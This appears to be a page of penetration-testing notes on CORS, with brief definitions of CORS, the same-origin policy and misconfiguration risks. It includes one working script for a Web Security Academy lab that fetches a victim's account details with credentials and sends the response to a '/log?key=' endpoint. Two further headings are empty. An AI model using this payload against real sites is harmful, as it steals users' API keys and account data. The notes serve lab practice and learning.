search

CORS

  • Definition: CORS (Cross-Origin Resource Sharing) is a browser mechanism that allows controlled access to resources from different domains.

  • Purpose: It extends the same-origin policy (SOP) to enable more flexible interactions between websites.

  • Vulnerabilities: Poorly configured CORS policies can lead to cross-domain attacks, such as data theft or unauthorized access.

  • Limitations: CORS does not protect against all types of cross-origin attacks, including CSRF (Cross-Site Request Forgery).

  • Same-Origin Policy: SOP restricts how a document or script can interact with resources from different origins to prevent malicious activities.

  • Relaxation Mechanism: CORS allows a controlled relaxation of SOP using HTTP headers that specify trusted origins and access permissions.

hashtag
Basic Origin refelction

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

hashtag
Null origin allowed

hashtag
Ajax steal api key

PreviousAccess ControlNextXXE Injections

Last updated